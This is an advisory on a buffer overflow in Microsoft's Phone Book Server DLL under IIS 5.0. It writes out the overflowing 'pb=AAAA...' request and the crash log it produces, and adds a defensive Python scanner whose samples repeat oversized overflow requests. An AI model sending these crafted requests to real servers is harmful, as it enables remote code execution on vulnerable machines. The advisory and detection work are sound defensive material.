Microsoft PhoneBook Server Buffer Overflow
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The Phone Book server serves requests through Internet Information Services 5.0 using URIs such as http://hostname/pbserver/. According to Microsoft's documentation, a DLL (PBSERVER.DLL) is exported and the service is used by making requests of the following format:

http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pbver=&pb=<STRING=db name>

The DLL checks the total length to ensure that the request does not exceed 1024 bytes; however, it is possible to overflow a local variable of fixed length in the DLL by sending a request of the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars) HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM, like the following:

The HTTP server encountered an unhandled exception while processing the ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B
For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.
By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL, allowing the execution of arbitrary code as user GUEST on the vulnerable machine.
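The advisory's point for defenders is that the DLL's 1024-byte check on the whole request says nothing about how much of that request lands in one fixed-size local variable, so a detection has to measure the pb= parameter on its own. The following is an added example, not code from CORE or from Microsoft's Phone Book service: a small Python scanner that takes HTTP request lines (from a proxy capture or web server log), picks out requests to pbserver.dll, and flags any whose percent-decoded pb= value is longer than an assumed threshold (MAX_PB_LEN, a hypothetical value chosen for illustration; the 1024-byte total limit is the one the advisory states). The sample request lines at the bottom are constructed, not real traffic. Measuring the decoded value matters because percent-encoding inflates what appears in the log while the bytes reaching the local buffer are the decoded ones.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Total request length the DLL itself checks, per the advisory.
TOTAL_LIMIT = 1024
# Assumed detection threshold for the pb= value (hypothetical): real phone-book
# names are short, and the advisory says values under 980 bytes already overflow
# the fixed-size local variable, so anything this long is worth an alert.
MAX_PB_LEN = 64

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<ver>\d\.\d)$")


def parse_request_line(line):
    """Split an HTTP request line into (method, target, version); None if malformed."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    return m.group("method"), m.group("target"), m.group("ver")


def pb_value(target):
    """Return the percent-decoded pb= value of a pbserver.dll request target, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/pbserver/pbserver.dll"):
        return None
    # keep_blank_values keeps 'pb=' with an empty value; runs of '&' with nothing
    # between them (the '?&&&&&&pb=' padding in the advisory) are skipped by parse_qsl.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() == "pb":  # case-insensitive match is a detection choice
            return value  # parse_qsl already applies percent-decoding
    return None


def classify(line):
    """Return a list of finding tags for one request line ([] when nothing is notable)."""
    parsed = parse_request_line(line)
    if parsed is None:
        return ["unparsed-request-line"]
    _method, target, _ver = parsed
    value = pb_value(target)
    if value is None:
        return []  # not a Phone Book request, or no pb= parameter
    findings = []
    if len(target) > TOTAL_LIMIT:
        findings.append("exceeds-total-limit")  # the DLL's own check rejects this
    # Measure the decoded value: the total-length check does not bound this field.
    if len(value) > MAX_PB_LEN:
        findings.append("oversized-pb")
    return findings


def scan(lines):
    """Return [(line_index, findings)] for every line that produced at least one finding."""
    results = []
    for i, line in enumerate(lines):
        findings = classify(line)
        if findings:
            results.append((i, findings))
    return results


# Constructed sample request lines (not real traffic).
SAMPLE_REQUESTS = [
    "GET /pbserver/pbserver.dll?osarch=9&ostype=2&osver=5&cmver=7.0&lcid=1033&pbver=1&pb=corp HTTP/1.0",
    "GET /pbserver/pbserver.dll?&&&&&&pb=" + "A" * 300 + " HTTP/1.0",
    "GET /pbserver/pbserver.dll?&&&&&&pb=" + "%41" * 300 + " HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /pbserver/pbserver.dll?pb=" + "A" * 1100 + " HTTP/1.0",
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS):
        print(index, findings)
```

The third sample request is the edge case: its raw target is well under 1024 bytes and every byte is percent-encoded, yet the decoded pb= value is 300 bytes, so it is flagged the same way as the plain one. The last sample exceeds the total limit and would be refused by the DLL itself, but it is still reported, since a rejected oversize request is worth seeing in the logs.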